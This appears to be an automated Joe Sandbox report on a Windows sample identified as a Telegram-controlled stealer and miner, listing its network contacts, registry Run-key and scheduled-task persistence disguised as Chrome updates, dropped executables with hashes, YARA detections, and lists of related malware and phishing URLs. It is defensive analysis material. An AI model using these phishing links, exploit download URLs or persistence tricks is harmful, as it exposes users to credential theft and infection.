                                    api.telegram.orgUnited Kingdom
                                    62041TELEGRAMRUtrue
                                    185.199.109.133
                                    raw.githubusercontent.comNetherlands
                                    54113FASTLYUStrue
                                    216.58.212.132
                                    www.google.comUnited States
                                    15169GOOGLEUSfalse
                                    Joe Sandbox version:40.0.0 Tourmaline
                                    Analysis ID:1452142
                                    Start date and time:2024-06-05 03:55:10 +02:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 13m 1s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:80
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:3
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:TS-240605-Millenium1.exe
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.evad.mine.winEXE@132/153@5/4
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:Failed
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, schtasks.exe
                                    • Excluded IPs from analysis (whitelisted): 40.126.32.140, 20.190.160.22, 40.126.32.72, 40.126.32.68, 40.126.32.76, 40.126.32.74, 40.126.32.138, 20.190.160.14, 93.184.221.240, 20.42.73.29, 142.250.185.99
                                    • Excluded domains from analysis (whitelisted): google.com, prdv4a.aadg.msidentity.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, wu.ec.azureedge.net, ctldl.windowsupdate.com, pool.hashvault.pro, wu.azureedge.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, ocsp.edge.digicert.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, gstatic.com, hlb.apr-52dd2-0.edgecastdns.net, umwatson.events.data.microsoft.com, wu-b-net.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                                    • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                    • Report size getting too big, too many NtCreateKey calls found.
                                    • Report size getting too big, too many NtEnumerateKey calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                    TimeTypeDescription
                                    02:56:35Task SchedulerRun new task: GoogleUpdateTaskMachineQC path: %ProgramFiles%\Google\Chrome\updater.exe
                                    02:56:39AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run C:\ProgramData\svchost.exe
                                    02:56:48AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ChromeUpdate C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe
                                    02:56:56AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run C:\ProgramData\svchost.exe
                                    02:57:04AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ChromeUpdate C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe
                                    21:56:26API Interceptor1x Sleep call for process: setup.exe modified
                                    21:56:26API Interceptor126x Sleep call for process: powershell.exe modified
                                    21:56:28API Interceptor34x Sleep call for process: main.exe modified
                                    21:56:34API Interceptor1x Sleep call for process: updater.exe modified
                                    21:56:34API Interceptor1x Sleep call for process: WMIC.exe modified
                                    21:57:07API Interceptor320330x Sleep call for process: winlogon.exe modified
                                    21:57:09API Interceptor269612x Sleep call for process: lsass.exe modified
                                    21:57:11API Interceptor7141x Sleep call for process: svchost.exe modified
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    208.95.112.1DPqKF5vqpe.exeGet hashmaliciousLummaC, Python Stealer, Amadey, Monster Stealer, PureLog Stealer, RedLine, SystemBCBrowse
                                    • ip-api.com/json
                                    rSOA_2388400.exeGet hashmaliciousAgentTeslaBrowse
                                    • ip-api.com/line/?fields=hosting
                                    rrTqdiabb.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                    • ip-api.com/line/?fields=hosting
                                    bcZKCl7InB.exeGet hashmaliciousAgentTeslaBrowse
                                    • ip-api.com/line/?fields=hosting
                                    VYoxkaHLzd.exeGet hashmaliciousXWormBrowse
                                    • ip-api.com/line/?fields=hosting
                                    6TWxXMNmQ7.exeGet hashmaliciousXWormBrowse
                                    • ip-api.com/line/?fields=hosting
                                    m25LNv52uB.exeGet hashmaliciousXWormBrowse
                                    • ip-api.com/line/?fields=hosting
                                    H2sUiEdqWp.exeGet hashmaliciousAgentTeslaBrowse
                                    • ip-api.com/line/?fields=hosting
                                    3W829li8ED.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                    • ip-api.com/line/?fields=hosting
                                    qWqaKrnuNk.exeGet hashmaliciousXWormBrowse
                                    • ip-api.com/line/?fields=hosting
                                    149.154.167.220VVTR3CvX6G.exeGet hashmaliciousXWormBrowse
                                      Inquiry-N#U00b0 3079-24-06.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                        17174820666abba04beb06decd59fe81a418fc4a6e713156eadeb8862809177a952460a28e137.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                          Quotation Request - RFQ018232901983234.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                            ShippingDocuments-PONBOM01577.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                              Inquiry-N#U00b0 3079-24-06.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.16366.10350.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                  2udVrfirtX.exeGet hashmaliciousAgentTeslaBrowse
                                                    quotationsheet.exeGet hashmaliciousAgentTeslaBrowse
                                                      file.xe.exeGet hashmaliciousAgentTeslaBrowse
                                                        185.199.109.133https://advaith07.github.io/Netflix_ui_cloneGet hashmaliciousUnknownBrowse
                                                          J5QZtYKm.posh.ps1Get hashmaliciousUnknownBrowse
                                                            TS-240531-UF2-Creal.exeGet hashmaliciousPython StealerBrowse
                                                              SecuriteInfo.com.Trojan.Siggen28.49964.22862.27682.exeGet hashmaliciousCoinhive, XmrigBrowse
                                                                http://www.pepe.vipGet hashmaliciousUnknownBrowse
                                                                  https://contact-meta-policy-here.vercel.app/next.html/Get hashmaliciousUnknownBrowse
                                                                    https://nimanbhattarai.github.io/Netflix-CloneGet hashmaliciousUnknownBrowse
                                                                      https://wsswsswsswss.github.io/myfirstswapGet hashmaliciousUnknownBrowse
                                                                        Android TV Tools v3_ES.exeGet hashmaliciousUnknownBrowse
                                                                          Android TV Tools v3_EN.exeGet hashmaliciousUnknownBrowse
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            raw.githubusercontent.comexploit.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                            • 185.199.108.133
                                                                            d-obf.batGet hashmaliciousAbobus ObfuscatorBrowse
                                                                            • 185.199.111.133
                                                                            J5QZtYKm.posh.ps1Get hashmaliciousUnknownBrowse
                                                                            • 185.199.109.133
                                                                            file.exeGet hashmaliciousPureLog Stealer, RedLine, RisePro StealerBrowse
                                                                            • 185.199.108.133
                                                                            cb67a188bafea0fd5f5e9725881c88a1c494763c094f76df73914bd8cadce170_dump.exeGet hashmaliciousPureLog Stealer, RedLine, RisePro StealerBrowse
                                                                            • 185.199.110.133
                                                                            f8cbaeb306d1b88f79680d5abaa871541cdaecbe8f28fe6e7b4d1c6e808a97de_payload.exeGet hashmaliciousPureLog Stealer, RedLine, RisePro StealerBrowse
                                                                            • 185.199.111.133
                                                                            https://raw.githubusercontent.com/ze0r/cve-2018-8453-exp/master/exp_x64_palette_length/x64/Release/exp.exeGet hashmaliciousUnknownBrowse
                                                                            • 185.199.110.133
                                                                            https://raw.githubusercontent.com/ze0r/cve-2018-8453-exp/master/exp_x64_palette_length/x64/Release/exp.exeGet hashmaliciousUnknownBrowse
                                                                            • 185.199.108.133
                                                                            https://raw.githubusercontent.com/ze0r/cve-2018-8453-exp/master/exp_x64_palette_length/x64/Release/exp.exeGet hashmaliciousUnknownBrowse
                                                                            • 185.199.110.133
                                                                            SecuriteInfo.com.Win64.Evo-gen.4435.12354.exeGet hashmaliciousCryptOne, GCleaner, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, RisePro StealerBrowse
                                                                            • 185.199.111.133
                                                                            ip-api.comrSOA_2388400.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 208.95.112.1
                                                                            rrTqdiabb.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 208.95.112.1
                                                                            bcZKCl7InB.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 208.95.112.1
                                                                            VYoxkaHLzd.exeGet hashmaliciousXWormBrowse
                                                                            • 208.95.112.1
                                                                            6TWxXMNmQ7.exeGet hashmaliciousXWormBrowse
                                                                            • 208.95.112.1
                                                                            m25LNv52uB.exeGet hashmaliciousXWormBrowse
                                                                            • 208.95.112.1
                                                                            H2sUiEdqWp.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 208.95.112.1
                                                                            3W829li8ED.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                            • 208.95.112.1
                                                                            qWqaKrnuNk.exeGet hashmaliciousXWormBrowse
                                                                            • 208.95.112.1
                                                                            g2pOMxWjKW.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                            • 208.95.112.1
                                                                            api.telegram.orgVVTR3CvX6G.exeGet hashmaliciousXWormBrowse
                                                                            • 149.154.167.220
                                                                            Inquiry-N#U00b0 3079-24-06.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                            • 149.154.167.220
                                                                            17174820666abba04beb06decd59fe81a418fc4a6e713156eadeb8862809177a952460a28e137.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 149.154.167.220
                                                                            Quotation Request - RFQ018232901983234.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                            • 149.154.167.220
                                                                            ShippingDocuments-PONBOM01577.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                            • 149.154.167.220
                                                                            Inquiry-N#U00b0 3079-24-06.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                            • 149.154.167.220
                                                                            SecuriteInfo.com.W32.AutoIt.YE.gen.Eldorado.16366.10350.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 149.154.167.220
                                                                            2udVrfirtX.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 149.154.167.220
                                                                            quotationsheet.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 149.154.167.220
                                                                            file.xe.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 149.154.167.220
                                                                            fp2e7a.wpc.phicdn.nethttps://secure-firstinterstatebank.weebly.comGet hashmaliciousHTMLPhisherBrowse
                                                                            • 192.229.221.95
                                                                            https://ignitechristianacademy.com/landing/switch-at-semester/Get hashmaliciousHTMLPhisherBrowse
                                                                            • 192.229.221.95
                                                                            https://www.dtmvvstroe.com/products/glucosemeter?fbclid=IwAR1k6Dvg7f8dQ-6SmQ_1V2jypO9heXODSNXbo-Yaptmgt3vD0FjdMjXpXTY_aem_AbN4faZMQf_mPGAiVRoRaROt2AjTJVbfU5Hl28o73uQ8sbEXRNDiz4lo76Ew2i5dxnziOjrGIzpIBRh6bQcKAgL7Get hashmaliciousUnknownBrowse
                                                                            • 192.229.221.95
                                                                            https://clps.it/iw9zkGet hashmaliciousUnknownBrowse
                                                                            • 192.229.221.95
                                                                            https://elenmistoprak.com/1496133940/Instagram.com.phpGet hashmaliciousUnknownBrowse
                                                                            • 192.229.221.95
                                                                            http://www.sorttexclothing.com/portugal/Get hashmaliciousUnknownBrowse
                                                                            • 192.229.221.95
                                                                            http://jeffco.usGet hashmaliciousUnknownBrowse
                                                                            • 192.229.221.95
                                                                            http://jgt.ygs.mybluehost.me/mimderz/netGet hashmaliciousHTMLPhisherBrowse
                                                                            • 192.229.221.95
                                                                            https://t21momma.com/inGet hashmaliciousUnknownBrowse
                                                                            • 192.229.221.95
                                                                            https://syderybaba.site/Get hashmaliciousUnknownBrowse
                                                                            • 192.229.221.95
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            TELEGRAMRUfile.exeGet hashmaliciousVidarBrowse
                                                                            • 149.154.167.99
                                                                            jL8AjRK30O.exeGet hashmaliciousCryptOne, VidarBrowse
                                                                            • 149.154.167.99
                                                                            zXC6sI6VAb.exeGet hashmaliciousCryptOne, VidarBrowse
                                                                            • 149.154.167.99
                                                                            VVTR3CvX6G.exeGet hashmaliciousXWormBrowse
                                                                            • 149.154.167.220
                                                                            file.exeGet hashmaliciousVidarBrowse
                                                                            • 149.154.167.99
                                                                            Inquiry-N#U00b0 3079-24-06.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                            • 149.154.167.220
                                                                            17174820666abba04beb06decd59fe81a418fc4a6e713156eadeb8862809177a952460a28e137.dat-decoded.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 149.154.167.220
                                                                            Quotation Request - RFQ018232901983234.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                            • 149.154.167.220
                                                                            ShippingDocuments-PONBOM01577.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                            • 149.154.167.220
                                                                            Jxo0X2iMrd.exeGet hashmaliciousCryptOne, VidarBrowse
                                                                            • 149.154.167.99
                                                                            FASTLYUShttps://secure-firstinterstatebank.weebly.comGet hashmaliciousHTMLPhisherBrowse
                                                                            • 151.101.193.46
                                                                            https://ignitechristianacademy.com/landing/switch-at-semester/Get hashmaliciousHTMLPhisherBrowse
                                                                            • 23.185.0.4
                                                                            https://elenmistoprak.com/1496133940/Instagram.com.phpGet hashmaliciousUnknownBrowse
                                                                            • 185.199.108.153
                                                                            https://pub-75689d854e6c4de1b0d582fd618f0788.r2.dev/NorthCoastConstructionOdoxtxx.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                            • 151.101.194.137
                                                                            https://int-review.pro/Qdw6Ueh2/auth2.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                            • 151.101.1.140
                                                                            https://mobile-facebookmetalyd.weebly.com/?fbclid=IwZXh0bgNhZW0CMTAAAR2jGyq7e0VOi25zqoufOOsZrVgRJn6Ow4jjT6iAh8d6NksK82_CurthOR4_aem_AZCE56VK2fBoGRfRpCelHC2gFaY9AvVzFjaqJp3Psy3XrHHOp4F2dMBnvsWQ6IXuFHvCoPp95Dp9-9uVPe83gBjaGet hashmaliciousUnknownBrowse
                                                                            • 151.101.129.46
                                                                            http://delicate-abrasive-dragonfruit.glitch.me/public/z1t0y.htmGet hashmaliciousUnknownBrowse
                                                                            • 151.101.130.137
                                                                            https://endearing-cranachan-46d870.netlify.app/appeal.html/Get hashmaliciousUnknownBrowse
                                                                            • 151.101.65.229
                                                                            https://1kb.link/8c563Get hashmaliciousHTMLPhisherBrowse
                                                                            • 151.101.1.140
                                                                            http://trans3ce2-nden3t-ban34ffee-qa-896b9d.netlify.app/dev.htmlGet hashmaliciousUnknownBrowse
                                                                            • 151.101.1.229
                                                                            TUT-ASUSDPqKF5vqpe.exeGet hashmaliciousLummaC, Python Stealer, Amadey, Monster Stealer, PureLog Stealer, RedLine, SystemBCBrowse
                                                                            • 208.95.112.1
                                                                            rSOA_2388400.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 208.95.112.1
                                                                            rrTqdiabb.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                            • 208.95.112.1
                                                                            bcZKCl7InB.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 208.95.112.1
                                                                            VYoxkaHLzd.exeGet hashmaliciousXWormBrowse
                                                                            • 208.95.112.1
                                                                            6TWxXMNmQ7.exeGet hashmaliciousXWormBrowse
                                                                            • 208.95.112.1
                                                                            m25LNv52uB.exeGet hashmaliciousXWormBrowse
                                                                            • 208.95.112.1
                                                                            H2sUiEdqWp.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 208.95.112.1
                                                                            3W829li8ED.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                            • 208.95.112.1
                                                                            qWqaKrnuNk.exeGet hashmaliciousXWormBrowse
                                                                            • 208.95.112.1
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            3b5074b1b5d032e5620f69f9f700ff0ecsskFdnsMZ.exeGet hashmaliciousBazaLoaderBrowse
                                                                            • 149.154.167.220
                                                                            • 185.199.109.133
                                                                            https://clps.it/iw9zkGet hashmaliciousUnknownBrowse
                                                                            • 149.154.167.220
                                                                            • 185.199.109.133
                                                                            http://jeffco.usGet hashmaliciousUnknownBrowse
                                                                            • 149.154.167.220
                                                                            • 185.199.109.133
                                                                            https://syderybaba.site/Get hashmaliciousUnknownBrowse
                                                                            • 149.154.167.220
                                                                            • 185.199.109.133
                                                                            https://int-review.pro/Qdw6Ueh2/auth2.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                            • 149.154.167.220
                                                                            • 185.199.109.133
                                                                            https://page-timedsdds.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                            • 149.154.167.220
                                                                            • 185.199.109.133
                                                                            https://protect-team-t440406-04ahd4.netlify.app/form.htmlGet hashmaliciousUnknownBrowse
                                                                            • 149.154.167.220
                                                                            • 185.199.109.133
                                                                            https://www.tggift7.site/a/Get hashmaliciousUnknownBrowse
                                                                            • 149.154.167.220
                                                                            • 185.199.109.133
                                                                            https://pub-18870b45185741c4afc2cd4880ebe308.r2.dev/final.html?folder=CZcrwFEGet hashmaliciousHTMLPhisherBrowse
                                                                            • 149.154.167.220
                                                                            • 185.199.109.133
                                                                            https://endearing-cranachan-46d870.netlify.app/appeal.html/Get hashmaliciousUnknownBrowse
                                                                            • 149.154.167.220
                                                                            • 185.199.109.133
                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            C:\ProgramData\main.exeDevxExecutor.exeGet hashmaliciousPython Stealer, Blank Grabber, CStealer, Discord Token Stealer, Millenuim RATBrowse
                                                                              C:\ProgramData\setup.exeDevxExecutor.exeGet hashmaliciousPython Stealer, Blank Grabber, CStealer, Discord Token Stealer, Millenuim RATBrowse
                                                                                hacn.exeGet hashmaliciousDiscord Token Stealer, Millenuim RAT, XmrigBrowse
                                                                                  C:\Program Files\Google\Chrome\updater.exeDevxExecutor.exeGet hashmaliciousPython Stealer, Blank Grabber, CStealer, Discord Token Stealer, Millenuim RATBrowse
                                                                                    hacn.exeGet hashmaliciousDiscord Token Stealer, Millenuim RAT, XmrigBrowse
                                                                                      C:\ProgramData\Microsoft\hacn.exeDevxExecutor.exeGet hashmaliciousPython Stealer, Blank Grabber, CStealer, Discord Token Stealer, Millenuim RATBrowse
                                                                                        Process:C:\ProgramData\setup.exe
                                                                                        File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):5617152
                                                                                        Entropy (8bit):7.71585644239634
                                                                                        Encrypted:false
                                                                                        SSDEEP:98304:Dei3W2HJn8hqIOLmRLRSo+QqvCRs19A3JIkLJQrAtjRQii7yXdmMpy2N:6Z2i4OcxQECE6ZIkLJIAt8y4
                                                                                        MD5:1274CBCD6329098F79A3BE6D76AB8B97
                                                                                        SHA1:53C870D62DCD6154052445DC03888CDC6CFFD370
                                                                                        SHA-256:BBE5544C408A6EB95DD9980C61A63C4EBC8CCBEECADE4DE4FAE8332361E27278
                                                                                        SHA-512:A0FEBBD4915791D3C32531FB3CF177EE288DD80CE1C8A1E71FA9AD59A4EBDDEEF69B6BE7F3D19E687B96DC59C8A8FA80AFFF8378A71431C3133F361B28E0D967
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        • Antivirus: ReversingLabs, Detection: 88%
                                                                                        Joe Sandbox View:
                                                                                        • Filename: DevxExecutor.exe, Detection: malicious, Browse
                                                                                        • Filename: hacn.exe, Detection: malicious, Browse
                                                                                        Preview:MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.v....U................@.............................PV.......U...`... ...............................................V......0V.......U..............@V.x.............................U.(.....................V.X............................text....u.......v..................`..`.data...`.U.......U..z..............@....rdata..`.....U......|U.............@..@.pdata........U.......U.............@..@.xdata........U.......U.............@..@.bss.... .....U..........................idata........V.......U.............@....CRT....`.....V.......U.............@....tls......... V.......U.............@....rsrc........0V.......U.............@....reloc..x....@V.......U.............@..B........................................................................................................................................................................
                                                                                        Process:C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe
                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):7759042
                                                                                        Entropy (8bit):7.993196079580177
                                                                                        Encrypted:true
                                                                                        SSDEEP:196608:trqeP9VnJurErvI9pWjgfPvzm6gsFEB4Aut:Hl3urEUWjC3zDb84Aut
                                                                                        MD5:363F8437904AD603ECDF0D5329610D88
                                                                                        SHA1:1EF9F6E50F91296C15D600EE6B42C60E70597A0A
                                                                                        SHA-256:25E8567BD4DAB1C168821CD06E9D17441289CE638B785C0A6D0F00480F688B62
                                                                                        SHA-512:D62D59B4F5980BAC4F013F395DBD0AEB9002657E3794C9E7CF4DC9072E4B4F31E1182C2BA9D1496293449AEA658A1BCABE0BA353B0DD0653AAAE768C39829FE9
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        • Antivirus: ReversingLabs, Detection: 51%
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............................-..............,..........................................Rich............................PE..d...A.Uf.........."....&.....v......@..........@......................................v...`.....................................................x....p.......0...#..z@v.H$......X...`............................... ...@...............8............................text............................... ..`.rdata..6/.......0..................@..@.data....3..........................@....pdata...#...0...$..................@..@_RDATA.......`......................@..@.rsrc........p......................@..@.reloc..X............"..............@..B........................................................................................................................................................................................
                                                                                        Process:C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exe
                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):25152315
                                                                                        Entropy (8bit):7.999194335744512
                                                                                        Encrypted:true
                                                                                        SSDEEP:393216:IDfDoc6/4m7/VBPt2XP8b/B+6M+8TIZ/iy1K4yoJq1HmnlOUyv5fkpHwsX:Ib7QvBt2XP8DB+DlSJ1K4y5PhSQ
                                                                                        MD5:B9F3E6E06F33EE7078F514D41BE5FAAD
                                                                                        SHA1:E2D35BC333EC6FF0F6AE60E55DACA44A433FC279
                                                                                        SHA-256:A7C3208CF3067D1DA12542CAB16516C9085620959DEB60DD000E190F15C74758
                                                                                        SHA-512:212A6540082A20DE6798D53E2C6F7F5705E5E4164620AA7F08A366E747F240C59C4C70CE0B8DD00625A0A960D1615073B4E48B2707ABE767B422F732C5927BED
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        • Antivirus: ReversingLabs, Detection: 67%
                                                                                        Joe Sandbox View:
                                                                                        • Filename: DevxExecutor.exe, Detection: malicious, Browse
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.Q...?...?...?.Z.<...?.Z.:...?.Z.;...?......?...:.9.?...;...?...<...?.Z.>...?...>...?.+.;...?.+.=...?.Rich..?.........................PE..d....];f.........."....%.....p.................@..........................................`.....................................................x....`..e.... ..."...........p..X... ..................................@............... ............................text............................... ..`.rdata...-..........................@..@.data...H3..........................@....pdata..."... ...$..................@..@_RDATA..\....P......................@..@.rsrc...e....`......................@..@.reloc..X....p......................@..B................................................................................................................................................................................................
                                                                                        Process:C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):5872344
                                                                                        Entropy (8bit):7.487098820179109
                                                                                        Encrypted:false
                                                                                        SSDEEP:98304:nsl27OuKr+gvhf2U9Nzm31PMoslkqXf0FvUcwti78OqJ7TPBvc8X6UcR65:nPOuK6mn9NzgMoYkSIvUcwti7TQlvciN
                                                                                        MD5:5DF3E2C717F267899F37EC6E8FC7F47A
                                                                                        SHA1:5E980079F67215BF69B8C1C16B56F40BF4A29958
                                                                                        SHA-256:E3F5C557ECE7EC27CB7E4A26482EADF0D9065065D94B2919F9B881BC74800E6E
                                                                                        SHA-512:8CEF1184120E010421D69FCF271822B3F0B45E34A1565152A3F2DECB8F500D0E69DE9816D9075683FCFB0F431713F3FBC42AC2D87503CDCDDE125ABA3FA1635D
                                                                                        Malicious:true
                                                                                        Yara Hits:
                                                                                        • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\ProgramData\main.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_DiscordTokenStealer, Description: Yara detected Discord Token Stealer, Source: C:\ProgramData\main.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_MillenuimRAT, Description: Yara detected Millenuim RAT, Source: C:\ProgramData\main.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\ProgramData\main.exe, Author: Joe Security
                                                                                        • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\ProgramData\main.exe, Author: Joe Security
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        • Antivirus: ReversingLabs, Detection: 83%
                                                                                        Joe Sandbox View:
                                                                                        • Filename: DevxExecutor.exe, Detection: malicious, Browse
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0...Y...........Y.. ........@.. ........................Z...........`.................................l.Y.O.....Y.@.....................Y.......Y.8............................................ ............... ..H............text....Y.. ....Y................. ..`.rsrc...@.....Y.......Y.............@..@.reloc........Y.......Y.............@..B..................Y.....H.........X.. ...............W..........................................(....*..(....*..{....*"..}....*..*F.{....o....s....*...2...{....o..../..{.....o....*.s,...*...(....,.(........2...{....o....2..{.....o....*.{......o....*..s,...*v..(....,.(.......{.....o....*2.{....o....*...2...{....o....2..*.{.....o.....{.....o....*>.{.....o....&.*..0..k.......s......{.....{....o....o.....{....o.....+&..(.......(....,...o[...oW...+...oW.....(....-...........o......*.......(.3[......>..s
                                                                                        Process:C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe
                                                                                        File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):5617152
                                                                                        Entropy (8bit):7.71585644239634
                                                                                        Encrypted:false
                                                                                        SSDEEP:98304:Dei3W2HJn8hqIOLmRLRSo+QqvCRs19A3JIkLJQrAtjRQii7yXdmMpy2N:6Z2i4OcxQECE6ZIkLJIAt8y4
                                                                                        MD5:1274CBCD6329098F79A3BE6D76AB8B97
                                                                                        SHA1:53C870D62DCD6154052445DC03888CDC6CFFD370
                                                                                        SHA-256:BBE5544C408A6EB95DD9980C61A63C4EBC8CCBEECADE4DE4FAE8332361E27278
                                                                                        SHA-512:A0FEBBD4915791D3C32531FB3CF177EE288DD80CE1C8A1E71FA9AD59A4EBDDEEF69B6BE7F3D19E687B96DC59C8A8FA80AFFF8378A71431C3133F361B28E0D967
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        • Antivirus: ReversingLabs, Detection: 88%
                                                                                        Joe Sandbox View:
                                                                                        • Filename: DevxExecutor.exe, Detection: malicious, Browse
                                                                                        • Filename: hacn.exe, Detection: malicious, Browse
                                                                                        Preview:MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.v....U................@.............................PV.......U...`... ...............................................V......0V.......U..............@V.x.............................U.(.....................V.X............................text....u.......v..................`..`.data...`.U.......U..z..............@....rdata..`.....U......|U.............@..@.pdata........U.......U.............@..@.xdata........U.......U.............@..@.bss.... .....U..........................idata........V.......U.............@....CRT....`.....V.......U.............@....tls......... V.......U.............@....rsrc........0V.......U.............@....reloc..x....@V.......U.............@..B........................................................................................................................................................................
                                                                                        Process:C:\Users\user\AppData\Local\Temp\_MEI78002\s.exe
